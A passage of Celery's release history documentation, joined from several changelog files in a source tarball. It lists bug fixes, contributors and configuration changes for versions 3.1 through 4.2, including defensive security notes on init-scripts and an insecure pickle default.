Fixed attribute error occurring when another node leaves. Fix contributed by Brodie Rao. - **Generic init-scripts:** Now runs a check at start-up to verify that any configuration scripts are owned by root and that they aren't world/group writable. The init-script configuration is a shell script executed by root, so this is a preventive measure to ensure that users don't leave this file vulnerable to changes by unprivileged users. .. note:: Note that upgrading Celery won't update the init-scripts, instead you need to manually copy the improved versions from the source distribution: https://github.com/celery/celery/tree/3.1/extra/generic-init.d - **Commands**: The :program:`celery purge` command now warns that the operation will delete all tasks and prompts the user for confirmation. A new :option:`-f ` was added that can be used to disable interactive mode. - **Task**: ``.retry()`` didn't raise the value provided in the ``exc`` argument when called outside of an error context (*Issue #1755*). - **Commands:** The :program:`celery multi` command didn't forward command line configuration to the target workers. The change means that multi will forward the special ``--`` argument and configuration content at the end of the arguments line to the specified workers. Example using command-line configuration to set a broker heartbeat from :program:`celery multi`: .. code-block:: bash $ celery multi start 1 -c3 -- broker.heartbeat=30 Fix contributed by Antoine Legrand. - **Canvas:** ``chain.apply_async()`` now properly forwards execution options. Fix contributed by Konstantin Podshumok. - **Redis result backend:** Now takes ``connection_pool`` argument that can be used to change the connection pool class/constructor. - **Worker:** Now truncates very long arguments and keyword arguments logged by the pool at debug severity. - **Worker:** The worker now closes all open files on :sig:`SIGHUP` (regression) (*Issue #1768*). Fix contributed by Brodie Rao - **Worker:** Will no longer accept remote control commands while the worker start-up phase is incomplete (*Issue #1741*). - **Commands:** The output of the event dump utility (:program:`celery events -d`) can now be piped into other commands. - **Documentation:** The RabbitMQ installation instructions for macOS was updated to use modern Homebrew practices. Contributed by Jon Chen. - **Commands:** The :program:`celery inspect conf` utility now works. - **Commands:** The :option:`--no-color ` argument was not respected by all commands (*Issue #1799*). - **App:** Fixed rare bug with ``autodiscover_tasks()`` (*Issue #1797*). - **Distribution:** The sphinx docs will now always add the parent directory to path so that the current Celery source code is used as a basis for API documentation (*Issue #1782*). - **Documentation:** :pypi:`supervisor` examples contained an extraneous '-' in a :option:`--logfile ` argument example. Fix contributed by Mohammad Almeer. .. _version-3.1.7: 3.1.7 ===== :release-date: 2013-12-17 06:00 p.m. UTC :release-by: Ask Solem .. _v317-important: Important Notes --------------- Init-script security improvements --------------------------------- Where the generic init-scripts (for ``celeryd``, and ``celerybeat``) before delegated the responsibility of dropping privileges to the target application, it will now use ``su`` instead, so that the Python program isn't trusted with superuser privileges. This isn't in reaction to any known exploit, but it will limit the possibility of a privilege escalation bug being abused in the future. You have to upgrade the init-scripts manually from this directory: https://github.com/celery/celery/tree/3.1/extra/generic-init.d AMQP result backend ~~~~~~~~~~~~~~~~~~~ The 3.1 release accidentally left the amqp backend configured to be non-persistent by default. Upgrading from 3.0 would give a "not equivalent" error when attempting to set or retrieve results for a task. That's unless you manually set the persistence setting:: CELERY_RESULT_PERSISTENT = True This version restores the previous value so if you already forced the upgrade by removing the existing exchange you must either keep the configuration by setting ``CELERY_RESULT_PERSISTENT = False`` or delete the ``celeryresults`` exchange again. Synchronous subtasks ~~~~~~~~~~~~~~~~~~~~ Tasks waiting for the result of a subtask will now emit a :exc:`RuntimeWarning` warning when using the prefork pool, and in 3.2 this will result in an exception being raised. It's not legal for tasks to block by waiting for subtasks as this is likely to lead to resource starvation and eventually deadlock when using the prefork pool (see also :ref:`task-synchronous-subtasks`). If you really know what you're doing you can avoid the warning (and the future exception being raised) by moving the operation in a white-list block: .. code-block:: python from celery.result import allow_join_result @app.task def misbehaving(): result = other_task.delay() with allow_join_result(): result.get() Note also that if you wait for the result of a subtask in any form when using the prefork pool you must also disable the pool prefetching behavior with the worker :ref:`-Ofair option `. .. _v317-fixes: Fixes ----- - Now depends on :ref:`Kombu 3.0.8 `. - Now depends on :mod:`billiard` 3.3.0.13 - Events: Fixed compatibility with non-standard json libraries that sends float as :class:`decimal.Decimal` (Issue #1731) - Events: State worker objects now always defines attributes: ``active``, ``processed``, ``loadavg``, ``sw_ident``, ``sw_ver`` and ``sw_sys``. - Worker: Now keeps count of the total number of tasks processed, not just by type (``all_active_count``). - Init-scripts: Fixed problem with reading configuration file when the init-script is symlinked to a runlevel (e.g., ``S02celeryd``). (Issue #1740). This also removed a rarely used feature where you can symlink the script to provide alternative configurations. You instead copy the script and give it a new name, but perhaps a better solution is to provide arguments to ``CELERYD_OPTS`` to separate them: .. code-block:: bash CELERYD_NODES="X1 X2 Y1 Y2" CELERYD_OPTS="-A:X1 x -A:X2 x -A:Y1 y -A:Y2 y" - Fallback chord unlock task is now always called after the chord header (Issue #1700). This means that the unlock task won't be started if there's an error sending the header. - Celery command: Fixed problem with arguments for some control commands. Fix contributed by Konstantin Podshumok. - Fixed bug in ``utcoffset`` where the offset when in DST would be completely wrong (Issue #1743). - Worker: Errors occurring while attempting to serialize the result of a task will now cause the task to be marked with failure and a :class:`kombu.exceptions.EncodingError` error. Fix contributed by Ionel Cristian Mărieș. - Worker with :option:`-B ` argument didn't properly shut down the beat instance. - Worker: The ``%n`` and ``%h`` formats are now also supported by the :option:`--logfile `, :option:`--pidfile ` and :option:`--statedb ` arguments. Example: .. code-block:: bash $ celery -A proj worker -n foo@%h --logfile=%n.log --statedb=%n.db - Redis/Cache result backends: Will now timeout if keys evicted while trying to join a chord. - The fallback unlock chord task now raises :exc:`Retry` so that the retry even is properly logged by the worker. - Multi: Will no longer apply Eventlet/gevent monkey patches (Issue #1717). - Redis result backend: Now supports UNIX sockets. Like the Redis broker transport the result backend now also supports using ``redis+socket:///tmp/redis.sock`` URLs. Contributed by Alcides Viamontes Esquivel. - Events: Events sent by clients was mistaken for worker related events (Issue #1714). For ``events.State`` the tasks now have a ``Task.client`` attribute that's set when a ``task-sent`` event is being received. Also, a clients logical clock isn't in sync with the cluster so they live in a "time bubble." So for this reason monitors will no longer attempt to merge with the clock of an event sent by a client, instead it will fake the value by using the current clock with a skew of -1. - Prefork pool: The method used to find terminated processes was flawed in that it didn't also take into account missing ``popen`` objects. - Canvas: ``group`` and ``chord`` now works with anon signatures as long as the group/chord object is associated with an app instance (Issue #1744). You can pass the app by using ``group(..., app=app)``. .. _version-3.1.6: 3.1.6 ===== :release-date: 2013-12-02 06:00 p.m. UTC :release-by: Ask Solem - Now depends on :mod:`billiard` 3.3.0.10. - Now depends on :ref:`Kombu 3.0.7 `. - Fixed problem where Mingle caused the worker to hang at start-up (Issue #1686). - Beat: Would attempt to drop privileges twice (Issue #1708). - Windows: Fixed error with ``geteuid`` not being available (Issue #1676). - Tasks can now provide a list of expected error classes (Issue #1682). The list should only include errors that the task is expected to raise during normal operation:: @task(throws=(KeyError, HttpNotFound)) What happens when an exceptions is raised depends on the type of error: - Expected errors (included in ``Task.throws``) Will be logged using severity ``INFO``, and traceback is excluded. - Unexpected errors Will be logged using severity ``ERROR``, with traceback included. - Cache result backend now compatible with Python 3 (Issue #1697). - CentOS init-script: Now compatible with SysV style init symlinks. Fix contributed by Jonathan Jordan. - Events: Fixed problem when task name isn't defined (Issue #1710). Fix contributed by Mher Movsisyan. - Task: Fixed unbound local errors (Issue #1684). Fix contributed by Markus Ullmann. - Canvas: Now unrolls groups with only one task (optimization) (Issue #1656). - Task: Fixed problem with ETA and timezones. Fix contributed by Alexander Koval. - Django: Worker now performs model validation (Issue #1681). - Task decorator now emits less confusing errors when used with incorrect arguments (Issue #1692). - Task: New method ``Task.send_event`` can be used to send custom events to Flower and other monitors. - Fixed a compatibility issue with non-abstract task classes - Events from clients now uses new node name format (``gen@``). - Fixed rare bug with Callable not being defined at interpreter shutdown (Issue #1678). Fix contributed by Nick Johnson. - Fixed Python 2.6 compatibility (Issue #1679). .. _version-3.1.5: 3.1.5 ===== :release-date: 2013-11-21 06:20 p.m. UTC :release-by: Ask Solem - Now depends on :ref:`Kombu 3.0.6 `. - Now depends on :mod:`billiard` 3.3.0.8 - App: ``config_from_object`` is now lazy (Issue #1665). - App: ``autodiscover_tasks`` is now lazy. Django users should now wrap access to the settings object in a lambda:: app.autodiscover_tasks(lambda: settings.INSTALLED_APPS) this ensures that the settings object isn't prepared prematurely. - Fixed regression for :option:`--app ` argument experienced by some users (Issue #1653). - Worker: Now respects the :option:`--uid ` and :option:`--gid ` arguments even if :option:`--detach ` isn't enabled. - Beat: Now respects the :option:`--uid ` and :option:`--gid ` arguments even if :option:`--detach ` isn't enabled. - Python 3: Fixed unorderable error occurring with the worker :option:`-B ` argument enabled. - ``celery.VERSION`` is now a named tuple. - ``maybe_signature(list)`` is now applied recursively (Issue #1645). - ``celery shell`` command: Fixed ``IPython.frontend`` deprecation warning. - The default app no longer includes the built-in fix-ups. This fixes a bug where ``celery multi`` would attempt to load the Django settings module before entering the target working directory. - The Django daemonization tutorial was changed. Users no longer have to explicitly export ``DJANGO_SETTINGS_MODULE`` in :file:`/etc/default/celeryd` when the new project layout is used. - Redis result backend: expiry value can now be 0 (Issue #1661). - Censoring settings now accounts for non-string keys (Issue #1663). - App: New ``autofinalize`` option. Apps are automatically finalized when the task registry is accessed. You can now disable this behavior so that an exception is raised instead. Example: .. code-block:: python app = Celery(autofinalize=False) # raises RuntimeError tasks = app.tasks @app.task def add(x, y): return x + y # raises RuntimeError add.delay(2, 2) app.finalize() # no longer raises: tasks = app.tasks add.delay(2, 2) - The worker didn't send monitoring events during shutdown. - Worker: Mingle and gossip is now automatically disabled when used with an unsupported transport (Issue #1664). - ``celery`` command: Preload options now supports the rare ``--opt value`` format (Issue #1668). - ``celery`` command: Accidentally removed options appearing before the sub-command, these are now moved to the end instead. - Worker now properly responds to ``inspect stats`` commands even if received before start-up is complete (Issue #1659). - :signal:`task_postrun` is now sent within a :keyword:`finally` block, to make sure the signal is always sent. - Beat: Fixed syntax error in string formatting. Contributed by :github_user:`nadad`. - Fixed typos in the documentation. Fixes contributed by Loic Bistuer, :github_user:`sunfinite`. - Nested chains now works properly when constructed using the ``chain`` type instead of the ``|`` operator (Issue #1656). .. _version-3.1.4: 3.1.4 ===== :release-date: 2013-11-15 11:40 p.m. UTC :release-by: Ask Solem - Now depends on :ref:`Kombu 3.0.5 `. - Now depends on :mod:`billiard` 3.3.0.7 - Worker accidentally set a default socket timeout of 5 seconds. - Django: Fix-up now sets the default app so that threads will use the same app instance (e.g., for :command:`manage.py runserver`). - Worker: Fixed Unicode error crash at start-up experienced by some users. - Calling ``.apply_async`` on an empty chain now works again (Issue #1650). - The ``celery multi show`` command now generates the same arguments as the start command does. - The :option:`--app ` argument could end up using a module object instead of an app instance (with a resulting crash). - Fixed a syntax error problem in the beat init-script. Fix contributed by Vsevolod. - Tests now passing on PyPy 2.1 and 2.2. .. _version-3.1.3: 3.1.3 ===== :release-date: 2013-11-13 00:55 a.m. UTC :release-by: Ask Solem - Fixed compatibility problem with Python 2.7.0 - 2.7.5 (Issue #1637) ``unpack_from`` started supporting ``memoryview`` arguments in Python 2.7.6. - Worker: :option:`-B ` argument accidentally closed files used for logging. - Task decorated tasks now keep their docstring (Issue #1636) .. _version-3.1.2: 3.1.2 ===== :release-date: 2013-11-12 08:00 p.m. UTC :release-by: Ask Solem - Now depends on :mod:`billiard` 3.3.0.6 - No longer needs the billiard C extension to be installed. - The worker silently ignored task errors. - Django: Fixed ``ImproperlyConfigured`` error raised when no database backend specified. Fix contributed by :github_user:`j0hnsmith`. - Prefork pool: Now using ``_multiprocessing.read`` with ``memoryview`` if available. - ``close_open_fds`` now uses ``os.closerange`` if available. - ``get_fdmax`` now takes value from ``sysconfig`` if possible. .. _version-3.1.1: 3.1.1 ===== :release-date: 2013-11-11 06:30 p.m. UTC :release-by: Ask Solem - Now depends on :mod:`billiard` 3.3.0.4. - Python 3: Fixed compatibility issues. - Windows: Accidentally showed warning that the billiard C extension wasn't installed (Issue #1630). - Django: Tutorial updated with a solution that sets a default :envvar:`DJANGO_SETTINGS_MODULE` so that it doesn't have to be typed in with the :program:`celery` command. Also fixed typos in the tutorial, and added the settings required to use the Django database backend. Thanks to Chris Ward, :github_user:`orarbel`. - Django: Fixed a problem when using the Django settings in Django 1.6. - Django: Fix-up shouldn't be applied if the django loader is active. - Worker: Fixed attribute error for ``human_write_stats`` when using the compatibility prefork pool implementation. - Worker: Fixed compatibility with billiard without C extension. - Inspect.conf: Now supports a ``with_defaults`` argument. - Group.restore: The backend argument wasn't respected. .. _version-3.1.0: 3.1.0 ======= :release-date: 2013-11-09 11:00 p.m. UTC :release-by: Ask Solem See :ref:`whatsnew-3.1`. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-4.0.rst0000664000175000017500000001444000000000000020311 0ustar00asifasif00000000000000.. _changelog-4.0: ================ Change history ================ This document contains change notes for bugfix releases in the 4.0.x series (latentcall), please see :ref:`whatsnew-4.0` for an overview of what's new in Celery 4.0. .. _version-4.0.2: 4.0.2 ===== :release-date: 2016-12-15 03:40 PM PST :release-by: Ask Solem - **Requirements** - Now depends on :ref:`Kombu 4.0.2 `. - **Tasks**: Fixed problem with JSON serialization of `group` (``keys must be string`` error, Issue #3688). - **Worker**: Fixed JSON serialization issue when using ``inspect active`` and friends (Issue #3667). - **App**: Fixed saferef errors when using signals (Issue #3670). - **Prefork**: Fixed bug with pack requiring bytes argument on Python 2.7.5 and earlier (Issue #3674). - **Tasks**: Saferepr did not handle unicode in bytestrings on Python 2 (Issue #3676). - **Testing**: Added new ``celery_worker_paremeters`` fixture. Contributed by **Michael Howitz**. - **Tasks**: Added new ``app`` argument to ``GroupResult.restore`` (Issue #3669). This makes the restore method behave the same way as the ``GroupResult`` constructor. Contributed by **Andreas Pelme**. - **Tasks**: Fixed type checking crash when task takes ``*args`` on Python 3 (Issue #3678). - Documentation and examples improvements by: - **BLAGA Razvan-Paul** - **Michael Howitz** - :github_user:`paradox41` .. _version-4.0.1: 4.0.1 ===== :release-date: 2016-12-08 05:22 PM PST :release-by: Ask Solem * [Security: `CELERYSA-0003`_] Insecure default configuration The default :setting:`accept_content` setting was set to allow deserialization of pickled messages in Celery 4.0.0. The insecure default has been fixed in 4.0.1, and you can also configure the 4.0.0 version to explicitly only allow json serialized messages: .. code-block:: python app.conf.accept_content = ['json'] .. _`CELERYSA-0003`: https://github.com/celery/celery/tree/master/docs/sec/CELERYSA-0003.txt - **Tasks**: Added new method to register class-based tasks (Issue #3615). To register a class based task you should now call ``app.register_task``: .. code-block:: python from celery import Celery, Task app = Celery() class CustomTask(Task): def run(self): return 'hello' app.register_task(CustomTask()) - **Tasks**: Argument checking now supports keyword-only arguments on Python3 (Issue #3658). Contributed by :github_user:`sww`. - **Tasks**: The ``task-sent`` event was not being sent even if configured to do so (Issue #3646). - **Worker**: Fixed AMQP heartbeat support for eventlet/gevent pools (Issue #3649). - **App**: ``app.conf.humanize()`` would not work if configuration not finalized (Issue #3652). - **Utils**: ``saferepr`` attempted to show iterables as lists and mappings as dicts. - **Utils**: ``saferepr`` did not handle unicode-errors when attempting to format ``bytes`` on Python 3 (Issue #3610). - **Utils**: ``saferepr`` should now properly represent byte strings with non-ascii characters (Issue #3600). - **Results**: Fixed bug in elasticsearch where _index method missed the body argument (Issue #3606). Fix contributed by **何翔宇** (Sean Ho). - **Canvas**: Fixed :exc:`ValueError` in chord with single task header (Issue #3608). Fix contributed by **Viktor Holmqvist**. - **Task**: Ensure class-based task has name prior to registration (Issue #3616). Fix contributed by **Rick Wargo**. - **Beat**: Fixed problem with strings in shelve (Issue #3644). Fix contributed by **Alli**. - **Worker**: Fixed :exc:`KeyError` in ``inspect stats`` when ``-O`` argument set to something other than ``fast`` or ``fair`` (Issue #3621). - **Task**: Retried tasks were no longer sent to the original queue (Issue #3622). - **Worker**: Python 3: Fixed None/int type comparison in :file:`apps/worker.py` (Issue #3631). - **Results**: Redis has a new :setting:`redis_socket_connect_timeout` setting. - **Results**: Redis result backend passed the ``socket_connect_timeout`` argument to UNIX socket based connections by mistake, causing a crash. - **Worker**: Fixed missing logo in worker splash screen when running on Python 3.x (Issue #3627). Fix contributed by **Brian Luan**. - **Deps**: Fixed ``celery[redis]`` bundle installation (Issue #3643). Fix contributed by **Rémi Marenco**. - **Deps**: Bundle ``celery[sqs]`` now also requires :pypi:`pycurl` (Issue #3619). - **Worker**: Hard time limits were no longer being respected (Issue #3618). - **Worker**: Soft time limit log showed ``Trues`` instead of the number of seconds. - **App**: ``registry_cls`` argument no longer had any effect (Issue #3613). - **Worker**: Event producer now uses ``connection_for_Write`` (Issue #3525). - **Results**: Redis/memcache backends now uses :setting:`result_expires` to expire chord counter (Issue #3573). Contributed by **Tayfun Sen**. - **Django**: Fixed command for upgrading settings with Django (Issue #3563). Fix contributed by **François Voron**. - **Testing**: Added a ``celery_parameters`` test fixture to be able to use customized ``Celery`` init parameters. (#3626) Contributed by **Steffen Allner**. - Documentation improvements contributed by - :github_user:`csfeathers` - **Moussa Taifi** - **Yuhannaa** - **Laurent Peuch** - **Christian** - **Bruno Alla** - **Steven Johns** - :github_user:`tnir` - **GDR!** .. _version-4.0.0: 4.0.0 ===== :release-date: 2016-11-04 02:00 P.M PDT :release-by: Ask Solem See :ref:`whatsnew-4.0` (in :file:`docs/whatsnew-4.0.rst`). .. _version-4.0.0rc7: 4.0.0rc7 ======== :release-date: 2016-11-02 01:30 P.M PDT Important notes --------------- - Database result backend related setting names changed from ``sqlalchemy_*`` -> ``database_*``. The ``sqlalchemy_`` named settings won't work at all in this version so you need to rename them. This is a last minute change, and as they were not supported in 3.1 we will not be providing aliases. - ``chain(A, B, C)`` now works the same way as ``A | B | C``. This means calling ``chain()`` might not actually return a chain, it can return a group or any other type depending on how the workflow can be optimized. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-4.1.rst0000664000175000017500000002136600000000000020317 0ustar00asifasif00000000000000.. _changelog-4.1: ================ Change history ================ This document contains change notes for bugfix releases in the 4.1.x series, please see :ref:`whatsnew-4.2` for an overview of what's new in Celery 4.2. .. _version-4.1.1: 4.1.1 ===== :release-date: 2018-05-21 12:48 PM PST :release-by: Omer Katz .. important:: Please upgrade as soon as possible or pin Kombu to 4.1.0. - **Breaking Change**: The module `async` in Kombu changed to `asynchronous`. Contributed by **Omer Katz & Asif Saifuddin Auvi** .. _version-4.1.0: 4.1.0 ===== :release-date: 2017-07-25 00:00 PM PST :release-by: Omer Katz - **Configuration**: CELERY_SEND_EVENTS instead of CELERYD_SEND_EVENTS for 3.1.x compatibility (#3997) Contributed by **abhinav nilaratna**. - **App**: Restore behavior so Broadcast queues work. (#3934) Contributed by **Patrick Cloke**. - **Sphinx**: Make appstr use standard format (#4134) (#4139) Contributed by **Preston Moore**. - **App**: Make id, name always accessible from logging.Formatter via extra (#3994) Contributed by **Yoichi NAKAYAMA**. - **Worker**: Add worker_shutting_down signal (#3998) Contributed by **Daniel Huang**. - **PyPy**: Support PyPy version 5.8.0 (#4128) Contributed by **Omer Katz**. - **Results**: Elasticsearch: Fix serializing keys (#3924) Contributed by :github_user:`staticfox`. - **Canvas**: Deserialize all tasks in a chain (#4015) Contributed by :github_user:`fcoelho`. - **Systemd**: Recover loglevel for ExecStart in systemd config (#4023) Contributed by **Yoichi NAKAYAMA**. - **Sphinx**: Use the Sphinx add_directive_to_domain API. (#4037) Contributed by **Patrick Cloke**. - **App**: Pass properties to before_task_publish signal (#4035) Contributed by **Javier Domingo Cansino**. - **Results**: Add SSL option for Redis backends (#3831) Contributed by **Chris Kuehl**. - **Beat**: celery.schedule.crontab: fix reduce (#3826) (#3827) Contributed by **Taylor C. Richberger**. - **State**: Fix celery issues when using flower REST API Contributed by **Thierry RAMORASOAVINA**. - **Results**: Elasticsearch: Fix serializing document id. Contributed by **Acey9**. - **Beat**: Make shallow copy of schedules dictionary Contributed by **Brian May**. - **Beat**: Populate heap when periodic tasks are changed Contributed by **Wojciech Żywno**. - **Task**: Allow class methods to define tasks (#3952) Contributed by **georgepsarakis**. - **Platforms**: Always return boolean value when checking if signal is supported (#3962). Contributed by **Jian Yu**. - **Canvas**: Avoid duplicating chains in chords (#3779) Contributed by **Ryan Hiebert**. - **Canvas**: Lookup task only if list has items (#3847) Contributed by **Marc Gibbons**. - **Results**: Allow unicode message for exception raised in task (#3903) Contributed by **George Psarakis**. - **Python3**: Support for Python 3.6 (#3904, #3903, #3736) Contributed by **Jon Dufresne**, **George Psarakis**, **Asif Saifuddin Auvi**, **Omer Katz**. - **App**: Fix retried tasks with expirations (#3790) Contributed by **Brendan MacDonell**. - * Fixes items format route in docs (#3875) Contributed by **Slam**. - **Utils**: Fix maybe_make_aware (#3850) Contributed by **Taylor C. Richberger**. - **Task**: Fix task ETA issues when timezone is defined in configuration (#3867) Contributed by **George Psarakis**. - **Concurrency**: Consumer does not shutdown properly when embedded in gevent application (#3746) Contributed by **Arcadiy Ivanov**. - **Canvas**: Fix #3725: Task replaced with group does not complete (#3731) Contributed by **Morgan Doocy**. - **Task**: Correct order in chains with replaced tasks (#3730) Contributed by **Morgan Doocy**. - **Result**: Enable synchronous execution of sub-tasks (#3696) Contributed by **shalev67**. - **Task**: Fix request context for blocking task apply (added hostname) (#3716) Contributed by **Marat Sharafutdinov**. - **Utils**: Fix task argument handling (#3678) (#3693) Contributed by **Roman Sichny**. - **Beat**: Provide a transparent method to update the Scheduler heap (#3721) Contributed by **Alejandro Pernin**. - **Beat**: Specify default value for pidfile option of celery beat. (#3722) Contributed by **Arnaud Rocher**. - **Results**: Elasticsearch: Stop generating a new field every time when a new result is being put (#3708) Contributed by **Mike Chen**. - **Requirements** - Now depends on :ref:`Kombu 4.1.0 `. - **Results**: Elasticsearch now reuses fields when new results are added. Contributed by **Mike Chen**. - **Results**: Fixed MongoDB integration when using binary encodings (Issue #3575). Contributed by **Andrew de Quincey**. - **Worker**: Making missing ``*args`` and ``**kwargs`` in Task protocol 1 return empty value in protocol 2 (Issue #3687). Contributed by **Roman Sichny**. - **App**: Fixed :exc:`TypeError` in AMQP when using deprecated signal (Issue #3707). Contributed by :github_user:`michael-k`. - **Beat**: Added a transparent method to update the scheduler heap. Contributed by **Alejandro Pernin**. - **Task**: Fixed handling of tasks with keyword arguments on Python 3 (Issue #3657). Contributed by **Roman Sichny**. - **Task**: Fixed request context for blocking task apply by adding missing hostname attribute. Contributed by **Marat Sharafutdinov**. - **Task**: Added option to run subtasks synchronously with ``disable_sync_subtasks`` argument. Contributed by :github_user:`shalev67`. - **App**: Fixed chaining of replaced tasks (Issue #3726). Contributed by **Morgan Doocy**. - **Canvas**: Fixed bug where replaced tasks with groups were not completing (Issue #3725). Contributed by **Morgan Doocy**. - **Worker**: Fixed problem where consumer does not shutdown properly when embedded in a gevent application (Issue #3745). Contributed by **Arcadiy Ivanov**. - **Results**: Added support for using AWS DynamoDB as a result backend (#3736). Contributed by **George Psarakis**. - **Testing**: Added caching on pip installs. Contributed by :github_user:`orf`. - **Worker**: Prevent consuming queue before ready on startup (Issue #3620). Contributed by **Alan Hamlett**. - **App**: Fixed task ETA issues when timezone is defined in configuration (Issue #3753). Contributed by **George Psarakis**. - **Utils**: ``maybe_make_aware`` should not modify datetime when it is already timezone-aware (Issue #3849). Contributed by **Taylor C. Richberger**. - **App**: Fixed retrying tasks with expirations (Issue #3734). Contributed by **Brendan MacDonell**. - **Results**: Allow unicode message for exceptions raised in task (Issue #3858). Contributed by :github_user:`staticfox`. - **Canvas**: Fixed :exc:`IndexError` raised when chord has an empty header. Contributed by **Marc Gibbons**. - **Canvas**: Avoid duplicating chains in chords (Issue #3771). Contributed by **Ryan Hiebert** and **George Psarakis**. - **Utils**: Allow class methods to define tasks (Issue #3863). Contributed by **George Psarakis**. - **Beat**: Populate heap when periodic tasks are changed. Contributed by :github_user:`wzywno` and **Brian May**. - **Results**: Added support for Elasticsearch backend options settings. Contributed by :github_user:`Acey9`. - **Events**: Ensure ``Task.as_dict()`` works when not all information about task is available. Contributed by :github_user:`tramora`. - **Schedules**: Fixed pickled crontab schedules to restore properly (Issue #3826). Contributed by **Taylor C. Richberger**. - **Results**: Added SSL option for redis backends (Issue #3830). Contributed by **Chris Kuehl**. - Documentation and examples improvements by: - **Bruno Alla** - **Jamie Alessio** - **Vivek Anand** - **Peter Bittner** - **Kalle Bronsen** - **Jon Dufresne** - **James Michael DuPont** - **Sergey Fursov** - **Samuel Dion-Girardeau** - **Daniel Hahler** - **Mike Helmick** - **Marc Hörsken** - **Christopher Hoskin** - **Daniel Huang** - **Primož Kerin** - **Michal Kuffa** - **Simon Legner** - **Anthony Lukach** - **Ed Morley** - **Jay McGrath** - **Rico Moorman** - **Viraj Navkal** - **Ross Patterson** - **Dmytro Petruk** - **Luke Plant** - **Eric Poelke** - **Salvatore Rinchiera** - **Arnaud Rocher** - **Kirill Romanov** - **Simon Schmidt** - **Tamer Sherif** - **YuLun Shih** - **Ask Solem** - **Tom 'Biwaa' Riat** - **Arthur Vigil** - **Joey Wilhelm** - **Jian Yu** - **YuLun Shih** - **Arthur Vigil** - **Joey Wilhelm** - :github_user:`baixuexue123` - :github_user:`bronsen` - :github_user:`michael-k` - :github_user:`orf` - :github_user:`3lnc` ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-4.2.rst0000664000175000017500000003243100000000000020313 0ustar00asifasif00000000000000.. _changelog-4.2: ================ Change history ================ This document contains change notes for bugfix releases in the 4.2.x series, please see :ref:`whatsnew-4.2` for an overview of what's new in Celery 4.2. 4.2.1 ===== :release-date: 2018-07-18 11:00 AM IST :release-by: Omer Katz - **Result Backend**: Fix deserialization of exceptions that are present in the producer codebase but not in the consumer codebase. Contributed by **John Arnold** - **Message Protocol Compatibility**: Fix error caused by an invalid (None) timelimit value in the message headers when migrating messages from 3.x to 4.x. Contributed by **Robert Kopaczewski** - **Result Backend**: Fix serialization of exception arguments when exception arguments are not JSON serializable by default. Contributed by **Tom Booth** - **Worker**: Fixed multiple issues with rate limited tasks Maintain scheduling order. Fix possible scheduling of a :class:`celery.worker.request.Request` with the wrong :class:`kombu.utils.limits.TokenBucket` which could cause tasks' rate limit to behave incorrectly. Fix possible duplicated execution of tasks that were rate limited or if ETA/Countdown was provided for them. Contributed by :github_user:`ideascf` - **Worker**: Defensively handle invalid timelimit header values in requests. Contributed by **Omer Katz** Documentation fixes: - **Matt Wiens** - **Seunghun Lee** - **Lewis M. Kabui** - **Prathamesh Salunkhe** 4.2.0 ===== :release-date: 2018-06-10 21:30 PM IST :release-by: Omer Katz - **Task**: Add ``ignore_result`` as task execution option (#4709, #3834) Contributed by **Andrii Kostenko** and **George Psarakis**. - **Redis Result Backend**: Do not create PubSub subscriptions when results are ignored (#4709, #3834) Contributed by **Andrii Kostenko** and **George Psarakis**. - **Redis Result Backend**: Result consumer always unsubscribes when task state is ready (#4666) Contributed by **George Psarakis**. - **Development/Testing**: Add docker-compose and base Dockerfile for development (#4482) Contributed by **Chris Mitchell**. - **Documentation/Sphinx**: Teach autodoc to document tasks if undoc-members is not set (#4588) Contributed by **Leo Singer**. - **Documentation/Sphinx**: Put back undoc-members option in sphinx test (#4586) Contributed by **Leo Singer**. - **Documentation/Sphinx**: Sphinx autodoc picks up tasks automatically only if `undoc-members` is set (#4584) Contributed by **Leo Singer**. - **Task**: Fix shadow_name issue when using previous version Task class (#4572) Contributed by :github_user:`pachewise`. - **Task**: Add support for bound tasks as `link_error` parameter (Fixes #3723) (#4545) Contributed by :github_user:`brabiega`. - **Deployment**: Add a command line option for setting the Result Backend URL (#4549) Contributed by :github_user:`y0ngdi`. - **CI**: Enable pip cache in appveyor build (#4546) Contributed by **Thijs Triemstra**. - **Concurrency/Asynpool**: Fix errno property name shadowing. Contributed by **Omer Katz**. - **DynamoDB Backend**: Configurable endpoint URL (#4532) Contributed by **Bohdan Rybak**. - **Timezones**: Correctly detect UTC timezone and timezone from settings (Fixes #4517) (#4519) Contributed by :github_user:`last-partizan`. - **Control**: Cleanup the mailbox's producer pool after forking (#4472) Contributed by **Nick Eaket**. - **Documentation**: Start Celery and Celery Beat on Azure WebJob (#4484) Contributed by **PauloPeres**. - **Celery Beat**: Schedule due tasks on startup, after Beat restart has occurred (#4493) Contributed by **Igor Kasianov**. - **Worker**: Use absolute time when task is accepted by worker pool (#3684) Contributed by **Régis Behmo**. - **Canvas**: Propagate arguments to chains inside groups (#4481) Contributed by **Chris Mitchell**. - **Canvas**: Fix `Task.replace` behavior in nested chords (fixes #4368) (#4369) Contributed by **Denis Shirokov** & **Alex Hill**. - **Installation**: Pass python_requires argument to setuptools (#4479) Contributed by **Jon Dufresne**. - **Message Protocol Compatibility**: Handle "hybrid" messages that have moved between Celery versions (#4358) (Issue #4356) Contributed by **Russell Keith-Magee**. - **Canvas**: request on_timeout now ignores soft time limit exception (fixes #4412) (#4473) Contributed by **Alex Garel**. - **Redis Result Backend**: Integration test to verify PubSub unsubscriptions (#4468) Contributed by **George Psarakis**. - **Message Protocol Properties**: Allow the shadow keyword argument and the shadow_name method to set shadow properly (#4381) Contributed by :github_user:`hclihn`. - **Canvas**: Run chord_unlock on same queue as chord body (#4448) (Issue #4337) Contributed by **Alex Hill**. - **Canvas**: Support chords with empty header group (#4443) Contributed by **Alex Hill**. - **Timezones**: make astimezone call in localize more safe (#4324) Contributed by **Matt Davis**. - **Canvas**: Fix length-1 and nested chords (#4437) (Issues #4393, #4055, #3885, #3597, #3574, #3323, #4301) Contributed by **Alex Hill**. - **CI**: Run `Openstack Bandit `_ in Travis CI in order to detect security issues. Contributed by **Omer Katz**. - **CI**: Run `isort `_ in Travis CI in order to lint Python **import** statements. Contributed by **Omer Katz**. - **Canvas**: Resolve TypeError on `.get` from nested groups (#4432) (Issue #4274) Contributed by **Misha Wolfson**. - **CouchDB Backend**: Correct CouchDB key string type for 